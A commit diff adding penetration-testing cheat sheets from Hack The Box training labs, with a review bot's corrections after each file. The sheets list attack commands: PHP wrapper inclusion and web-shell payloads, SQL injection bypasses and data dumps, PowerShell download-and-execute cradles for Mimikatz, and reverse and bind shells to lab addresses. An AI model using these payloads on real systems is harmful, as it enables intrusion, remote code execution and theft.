M README.md => README.md +1 -0
@@ 1,3 1,4 @@
Solutions to Hack The Box (HTB) machines
+- [cheatsheets](./cheatsheets)
- [gettingstarted.htb](./gettingstarted.htb/README.md)
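Review bot: the new `cheatsheets` entry links to a bare directory while the sibling `gettingstarted.htb` entry links to a `README.md`, so it renders as a file listing rather than a page. Consider adding a `cheatsheets/README.md` that lists the six sheets added in this commit (`Directory-Traversal.md`, `File-Transfer.md`, `SQL_Injections.md`, `ffuf.md`, `getting-started.md`, `windows.md`) and pointing the entry at it, and give the entry a short description so readers know these are command references rather than machine write-ups like the rest of the repository.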
A cheatsheets/Directory-Traversal.md => cheatsheets/Directory-Traversal.md +8 -0
@@ 0,0 1,8 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `php://filter/read=convert.base64-encode/resource=/etc/passwd` | PHP filter to convert file contents to Base64 |
+| `php://filter/read=string.rot13/resource=/etc/passwd` | PHP filter to convert file contents to ROT13 |
+| `expect://id` | Command execution with PHP `Expect` wrapper |
+| `curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"` | Using PHP `Input` wrapper for command execution |
+| `zip://malicious.zip%23exec.php&cmd=id` | Command execution with the PHP `Zip` wrapper |
+| `<?php system($_GET['cmd']); ?>` | PHP web shell file contents (i.e., shell.php) |<
\ No newline at end of file
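Review bot: the `curl ... php://input` row hard-codes a lab address (`http://134.209.184.216:30084/index.php`), which will be stale the moment the lab instance is gone; the other sheets use `SERVER_IP:PORT` placeholders, so use the same here. Two caveats belong in the descriptions so a reader knows when a row applies at all: `expect://` only works when the non-default `expect` PECL extension is loaded, and `php://input` (like any remote wrapper) requires `allow_url_include=On`, which PHP ships disabled; a target with default settings simply will not behave as the rows describe. The file is titled `Directory-Traversal`, but every row is a PHP stream wrapper used through file inclusion rather than a path-traversal sequence, so `File-Inclusion.md` would match the contents. Minor: "(i.e., shell.php)" should be "(e.g., shell.php)", and this file, like the other new files in this commit, ends without a trailing newline.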
A cheatsheets/File-Transfer.md => cheatsheets/File-Transfer.md +13 -0
@@ 0,0 1,13 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1` | Download a file with PowerShell |
+| `IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')` | Execute a file in memory using PowerShell |
+| `Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64` | Upload a file with PowerShell |
+| `bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe` | Download a file using Bitsadmin |
+| `certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe` | Download a file using Certutil |
+| `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh` | Download a file using Wget |
+| `curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh` | Download a file using cURL |
+| `php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'` | Download a file using PHP |
+| `scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip` | Upload a file using SCP |
+| `scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe` | Download a file using SCP |
+| `Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"` | Invoke-WebRequest using a Chrome User Agent |<
\ No newline at end of file
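Review bot: the last row's URL `http://nc.exe` has lost its host and would not resolve; the rows above use `https://<snip>/...`, so it should read `http://<snip>/nc.exe`. The POST upload row references `$b64` without saying what it is; state in the description that the variable must already hold the Base64-encoded file contents, otherwise the command sends an empty body. The sheet also mixes `<snip>` placeholders with literal lab addresses (`10.10.10.32`, `10.10.10.150`) and a bare `target` hostname; picking one placeholder style keeps the sheet reusable.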
A cheatsheets/SQL_Injections.md => cheatsheets/SQL_Injections.md +69 -0
@@ 0,0 1,69 @@
+## MySQL
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| **General** |
+| `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | login to mysql database |
+| `SHOW DATABASES` | List available databases |
+| `USE users` | Switch to database |
+| **Tables** |
+| `CREATE TABLE logins (id INT, ...)` | Add a new table |
+| `SHOW TABLES` | List available tables in current database |
+| `DESCRIBE logins` | Show table properties and columns |
+| `INSERT INTO table_name VALUES (value_1,..)` | Add values to table |
+| `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table |
+| `UPDATE table_name SET column1=newvalue1, ... WHERE <condition>` | Update table values |
+| **Columns** |
+| `SELECT * FROM table_name` | Show all columns in a table |
+| `SELECT column1, column2 FROM table_name` | Show specific columns in a table |
+| `DROP TABLE logins` | Delete a table |
+| `ALTER TABLE logins ADD newColumn INT` | Add new column |
+| `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column |
+| `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype |
+| `ALTER TABLE logins DROP oldColumn` | Delete column |
+| **Output** |
+| `SELECT * FROM logins ORDER BY column_1` | Sort by column |
+| `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order |
+| `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two-columns |
+| `SELECT * FROM logins LIMIT 2` | Only show first two results |
+| `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 |
+| `SELECT * FROM table_name WHERE <condition>` | List results that meet a condition |
+| `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string |
+
+## MySQL Operator Precedence
+* Division (`/`), Multiplication (`*`), and Modulus (`%`)
+* Addition (`+`) and Subtraction (`-`)
+* Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
+* NOT (`!`)
+* AND (`&&`)
+* OR (`||`)
+
+## SQL Injection
+| **Payload** | **Description** |
+| --------------|-------------------|
+| **Auth Bypass** |
+| `admin' or '1'='1` | Basic Auth Bypass |
+| `admin')-- -` | Basic Auth Bypass With comments |
+| [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) |
+| **Union Injection** |
+| `' order by 1-- -` | Detect number of columns using `order by` |
+| `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection |
+| `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection |
+| `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns |
+| **DB Enumeration** |
+| `SELECT @@version` | Fingerprint MySQL with query output |
+| `SELECT SLEEP(5)` | Fingerprint MySQL with no output |
+| `cn' UNION select 1,database(),2,3-- -` | Current database name |
+| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
+| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database |
+| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table |
+| `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database |
+| **Privileges** |
+| `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user |
+| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges |
+| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find if all user privileges |
+| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL |
+| **File Injection** |
+| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
+| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
+| `cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |<
\ No newline at end of file
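Review bot: the `information_schema.user_privileges` row filters on `WHERE user="root"`, but that view has no `user` column (its columns are `GRANTEE`, `TABLE_CATALOG`, `PRIVILEGE_TYPE`, `IS_GRANTABLE`), so the query fails with an unknown-column error; filter on `grantee LIKE "'root'%"` instead, and change the description "Find if all user privileges" to "List all privileges of a user". On the next row, `information_schema.global_variables` was removed in MySQL 5.7 (the table now lives in `performance_schema`); `SHOW VARIABLES LIKE 'secure_file_priv'` works across versions and, when it is set (the packaged default on most distributions), explains why the `LOAD_FILE` and `INTO OUTFILE` rows below return NULL or error. The operator-precedence list conflates `NOT` and `!`: in MySQL `!` binds tighter than `*`/`/`, and only the `NOT` keyword sits between the comparison operators and `AND`, so the list should say `NOT` and drop the `!`. Minor: "Sort by two-columns" should be "two columns", and "starting from index 2" for `LIMIT 1, 2` reads more clearly as "skip the first row and show the next two".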
A cheatsheets/ffuf.md => cheatsheets/ffuf.md +31 -0
@@ 0,0 1,31 @@
+# Ffuf
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `ffuf -h` | ffuf help |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ` | Directory Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ` | Extension Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php` | Page Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v` | Recursive Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/` | Sub-domain Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx` | VHost Fuzzing |
+| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx` | Parameter Fuzzing - GET |
+| `ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Parameter Fuzzing - POST |
+| `ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx` | Value Fuzzing |
+
+# Wordlists
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt` | Directory/Page Wordlist |
+| `/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt` | Extensions Wordlist |
+| `/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt` | Domain Wordlist |
+| `/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt` | Parameters Wordlist |
+
+# Misc
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| `sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'` | Add DNS entry |
+| `for i in $(seq 1 1000); do echo $i >> ids.txt; done` | Create Sequence Wordlist |
+| `curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'` | curl w/ POST |<
\ No newline at end of file
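Review bot: the Wordlists table keeps the `**Command**` header from the other tables, but the column holds file paths; rename it to `**Path**` or `**Wordlist**`. The `/etc/hosts` row is described as "Add DNS entry", but it adds a local hosts-file mapping and no DNS is involved; "Add /etc/hosts entry" is accurate. The sequence-wordlist loop appends with `>>`, so running it twice produces duplicate lines; `seq 1 1000 > ids.txt` is shorter and idempotent. The `-fs xxx` placeholder would be more useful as "-fs <size of the default response>" so readers know what to substitute. Style: this sheet uses `#` headings while the other sheets in the commit use `##`.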
A cheatsheets/getting-started.md => cheatsheets/getting-started.md +89 -0
@@ 0,0 1,89 @@
+## Basic Tools
+
+| **Command** | **Description** |
+| --------------|-------------------|
+| **General** |
+| `sudo openvpn user.ovpn` | Connect to VPN |
+| `ifconfig`/`ip a` | Show our IP address |
+| `netstat -rn` | Show networks accessible via the VPN |
+| `ssh user@10.10.10.10` | SSH to a remote server |
+| `ftp 10.129.42.253` | FTP to a remote server |
+| **tmux** |
+| `tmux` | Start tmux |
+| `ctrl+b ctrl+c` | tmux: new window |
+| `ctrl+b 1` | tmux: switch to window (`1`) |
+| `ctrl+%` | tmux: split pane vertically |
+| `ctrl+"` | tmux: split pane horizontally |
+| `ctrl+->` | tmux: switch to the right pane |
+| **Vim** |
+| `vim file` | vim: open `file` with vim |
+| `esc+i` | vim: enter `insert` mode |
+| `esc` | vim: back to `normal` mode |
+| `x` | vim: Cut character |
+| `dw` | vim: Cut word |
+| `dd` | vim: Cut full line |
+| `yw` | vim: Copy word |
+| `yy` | vim: Copy full line |
+| `p` | vim: Paste |
+| `:1` | vim: Go to line number 1. |
+| `:w` | vim: Write the file 'i.e. save' |
+| `:q` | vim: Quit |
+| `:q!` | vim: Quit without saving |
+| `:wq` | vim: Write and quit |
+
+## Pentesting
+| **Command** | **Description** |
+| --------------|-------------------|
+| **Service Scanning** |
+| `nmap 10.129.42.253` | Run nmap on an IP |
+| `nmap -sV -sC -p- 10.129.42.253` | Run an nmap script scan on an IP |
+| `locate scripts/citrix` | List various available nmap scripts |
+| `nmap --script smb-os-discovery.nse -p445 10.10.10.40` | Run an nmap script on an IP |
+| `netcat 10.10.10.10 22` | Grab banner of an open port |
+| `smbclient -N -L \\\\10.129.42.253` | List SMB Shares |
+| `smbclient \\\\10.129.42.253\\users` | Connect to an SMB share |
+| `snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0` | Scan SNMP on an IP |
+| `onesixtyone -c dict.txt 10.129.42.254` | Brute force SNMP secret string |
+| **Web Enumeration** |
+| `gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt` | Run a directory scan on a website |
+| `gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt` | Run a sub-domain scan on a website |
+| `curl -IL https://www.inlanefreight.com` | Grab website banner |
+| `whatweb 10.10.10.121` | List details about the webserver/certificates |
+| `curl 10.10.10.121/robots.txt` | List potential directories in `robots.txt` |
+| `ctrl+U` | View page source (in Firefox) |
+| **Public Exploits** |
+| `searchsploit openssh 7.2` | Search for public exploits for a web application |
+| `msfconsole` | MSF: Start the Metasploit Framework |
+| `search exploit eternalblue` | MSF: Search for public exploits in MSF |
+| `use exploit/windows/smb/ms17_010_psexec` | MSF: Start using an MSF module |
+| `show options` | MSF: Show required options for an MSF module |
+| `set RHOSTS 10.10.10.40` | MSF: Set a value for an MSF module option |
+| `check` | MSF: Test if the target server is vulnerable |
+| `exploit` | MSF: Run the exploit on the target server is vulnerable |
+| **Using Shells** |
+| `nc -lvnp 1234` | Start a `nc` listener on a local port |
+| `bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'` | Send a reverse shell from the remote server |
+| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 10.10.10.10 1234 >/tmp/f` | Another command to send a reverse shell from the remote server |
+| `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc -lvp 1234 >/tmp/f` | Start a bind shell on the remote server |
+| `nc 10.10.10.1 1234` | Connect to a bind shell started on the remote server |
+| `python -c 'import pty; pty.spawn("/bin/bash")'` | Upgrade shell TTY (1) |
+| `ctrl+z` then `stty raw -echo` then `fg` then `enter` twice | Upgrade shell TTY (2) |
+| `echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php` | Create a webshell php file |
+| `curl http://SERVER_IP:PORT/shell.php?cmd=id` | Execute a command on an uploaded webshell |
+| **Privilege Escalation** |
+| `./linpeas.sh` | Run `linpeas` script to enumerate remote server |
+| `sudo -l` | List available `sudo` privileges |
+| `sudo -u user /bin/echo Hello World!` | Run a command with `sudo` |
+| `sudo su -` | Switch to root user (if we have access to `sudo su`) |
+| `sudo su user -` | Switch to a user (if we have access to `sudo su`) |
+| `ssh-keygen -f key` | Create a new SSH key |
+| `echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys` | Add the generated public key to the user |
+| `ssh root@10.10.10.10 -i key` | SSH to the server with the generated private key |
+| **Transferring Files** |
+| `python3 -m http.server 8000` | Start a local webserver |
+| `wget http://10.10.14.1:8000/linpeas.sh` | Download a file on the remote server from our local machine |
+| `curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` | Download a file on the remote server from our local machine |
+| `scp linenum.sh user@remotehost:/tmp/linenum.sh` | Transfer a file to the remote server with `scp` (requires SSH access) |
+| `base64 shell -w 0` | Convert a file to `base64` |
+| `echo f0VMR...SNIO...InmDwU \| base64 -d > shell` | Convert a file from `base64` back to its orig |
+| `md5sum shell` | Check the file's `md5sum` to ensure it converted correctly |<
\ No newline at end of file
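Review bot: the tmux rows drop the prefix key: `ctrl+%`, `ctrl+"` and `ctrl+->` are not tmux bindings; they should be `ctrl+b %`, `ctrl+b "` and `ctrl+b →`, and the default new-window binding is `ctrl+b c`, not `ctrl+b ctrl+c`. `sudo su user -` has the arguments in the wrong order; `su` expects the login-shell dash before the user name, `sudo su - user`. In the SSH key rows, say that the public key to append comes from `key.pub`, since `ssh-keygen -f key` writes both files. Description fixes: "Run the exploit on the target server is vulnerable" has a dangling clause; `searchsploit openssh 7.2` is described as a web-application search but the example is OpenSSH; "back to its orig" should be "original"; and the placeholder `SNIO` in the `base64 -d` row should match the `SNIP` used elsewhere. The bind-shell connect row uses `10.10.10.1` while every other row uses `10.10.10.10`.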
A cheatsheets/windows.md => cheatsheets/windows.md +23 -0
@@ 0,0 1,23 @@
+| **Command** | **Description** |
+| --------------|-------------------|
+| `xfreerdp /v:<target IP address> /u:htb-student /p:<password>` | RDP to lab target |
+| `Get-WmiObject -Class win32_OperatingSystem` | Get information about the operating system |
+| `dir c:\ /a` | View all files and directories in the c:\ root directory |
+| `tree <directory>` | Graphically displaying the directory structure of a path |
+| `tree c:\ /f \| more` | Walk through results of the `tree` command page by page |
+| `icacls <directory>` | View the permissions set on a directory |
+| `icacls c:\users /grant joe:f` | Grant a user full permissions to a directory |
+| `icacls c:\users /remove joe` | Remove a users' permissions on a directory |
+| `Get-Service` | `PowerShell` cmdlet to view running services |
+| `help <command>` | Display the help menu for a specific command |
+| `get-alias` | List `PowerShell` aliases |
+| `New-Alias -Name "Show-Files" Get-ChildItem` | Create a new `PowerShell` alias |
+| `Get-Module \| select Name,ExportedCommands \| fl` | View imported `PowerShell` modules and their associated commands |
+| `Get-ExecutionPolicy -List` | View the `PowerShell` execution policy |
+| `Set-ExecutionPolicy Bypass -Scope Process` | Set the `PowerShell` execution policy to bypass for the current session |
+| `wmic os list brief` | Get information about the operating system with `wmic` |
+| `Invoke-WmiMethod` | Call methods of `WMI` objects |
+| `whoami /user` | View the current users' SID |
+| `reg query <key>` | View information about a registry key |
+| `Get-MpComputerStatus` | Check which `Defender` protection settings are enabled |
+| `sconfig` | Load Server Configuration menu in Windows Server Core |<
\ No newline at end of file
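Review bot: `Get-WmiObject` and `Invoke-WmiMethod` exist only in Windows PowerShell 5.1 and are absent from PowerShell 7, so note that or list the CIM equivalents (`Get-CimInstance -ClassName Win32_OperatingSystem`, `Invoke-CimMethod`), which work in both. Grammar in the descriptions: "Remove a users' permissions" and "the current users' SID" should be "a user's" and "the current user's", and "Graphically displaying the directory structure" should be "Graphically display". This sheet has no heading, while the others in the commit open with a title or section heading.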